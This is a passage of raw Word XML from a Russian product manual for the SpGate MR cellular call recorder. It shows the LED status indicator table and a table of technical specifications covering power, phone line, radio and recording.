            <w:tcW w:w="2043" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Индикатор</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3454" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Состояние</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4416" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Описание</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="317"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2043" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Power</w:t>
            </w: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Не горит</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Нет питания</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="313"/>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Есть питание</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="313"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2043" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="814"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Net</w:t>
            </w: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Не горит</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GSM-модуль выключен</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="313"/>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Мигает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Включение сотового регистратора</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="003A66C2" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="631"/>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Мигает красным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lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Отсутствие или ошибка регистрации</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>SIM</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>-карты</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="003A66C2" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="313"/>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красным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lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Низкий уровень сигнала сотовой сети</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="003A66C2" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="313"/>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Мигает красно-зеленым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lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Средний уровень сигнала сотовой сети</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="003A66C2" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="448"/>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lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Высокий уровень сигнала сотовой сети</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="313"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2043" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Talk</w:t>
            </w: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Не горит</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Нет активных вызовов</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="313"/>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Входящий/исходящий вызов</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="352"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2043" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="826"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Stat</w:t>
            </w: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Не горит</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USB кабель не подключен</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="50"/>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Подключен USB кабель</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="352"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2043" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>SD card</w:t>
            </w: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красным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SD карта не установлена</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="352"/>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Мигает красным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SD карта заблокирована</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="352"/>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Инициализация SD карты</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="352"/>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Мигает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Идет запись разговора</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00233B41" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_TOC_250013"/>
      <w:r w:rsidRPr="00233B41">
        <w:t>Технические</w:t>
      </w:r>
      <w:r w:rsidRPr="00233B41">
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidRPr="00233B41">
        <w:t>характеристики</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="3099"/>
          <w:tab w:val="left" w:pos="5501"/>
          <w:tab w:val="left" w:pos="7001"/>
          <w:tab w:val="left" w:pos="9059"/>
          <w:tab w:val="left" w:pos="9356"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Технические</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>характеристики</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>сотового</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>регистратора</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SpGate</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MR</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> приведены в Таблице</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>4.1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Таблица 4.1 Технические характеристики сотового регистратора</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9358"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6085"/>
        <w:gridCol w:w="3261"/>
        <w:gridCol w:w="12"/>
      </w:tblGrid>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Характеристики питания</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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="293"/>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Напряжение питания, В</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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="600"/>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Средняя потребляемая мощность</w:t>
            </w:r>
          </w:p>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в режиме разговора, Вт не более</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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="596"/>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Максимальная потребляемая мощность,</w:t>
            </w:r>
          </w:p>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Вт не более</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12</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Характеристики телефонной линии</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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="596"/>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lastRenderedPageBreak/>
              <w:t>Номинальное напряжение в линии</w:t>
            </w:r>
          </w:p>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при положенной трубке, В</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48</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Номинальное вызывное напряжение, В не менее</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60</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Ток в линии при поднятой трубке, мА, не менее</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20</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Рабочий диапазон звуковых частот, Гц</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300-4000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00623E46" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="898"/>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Определитель номера</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="2078"/>
                <w:tab w:val="left" w:pos="3648"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="709"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>DTMF</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>FSK</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:tab/>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>MDMF</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="-3"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>по</w:t>
            </w:r>
          </w:p>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 xml:space="preserve">умолчанию </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>FSK</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> с тональным предупреждением</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Частота вызывного сигнала, Гц</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10-60 по умолчанию – 30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="293"/>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Детектор набора</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Импульсный/тоновый</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Радиочастотные характеристики</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Диапазон частот, МГц</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900/1800</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Чувствительность приемника, дБм</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-108</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Мощность передатчика на частоте 900 МГц, Вт</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2 (Class 4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="293"/>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Мощность передатчика на частоте 1800 МГц, Вт</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 (Class 1)</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Характеристики записи</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Поддерживаемые тип карт памяти</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SDHC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="1200"/>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Типы сжатия</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rPr>
              <w:t>PCM</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> 16</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>bit</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>/8</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>kHz</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> (128 кбит/с)</w:t>
            </w:r>
          </w:p>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G.711 A-law (64 кбит / с)</w:t>
            </w:r>
          </w:p>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IMA ADPCM (32 кбит/с)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="293"/>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Частота дискретизации</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8000 Гц</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Условия хранения и эксплуатации</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Рабочий диапазон температур, ° С</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+5 …+40</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Температура хранения в заводской упаковке, ° С</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-50 …+50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="12" w:type="dxa"/>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Габариты и вес</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3261"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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="12" w:type="dxa"/>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Габариты ШxГxВ, мм</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
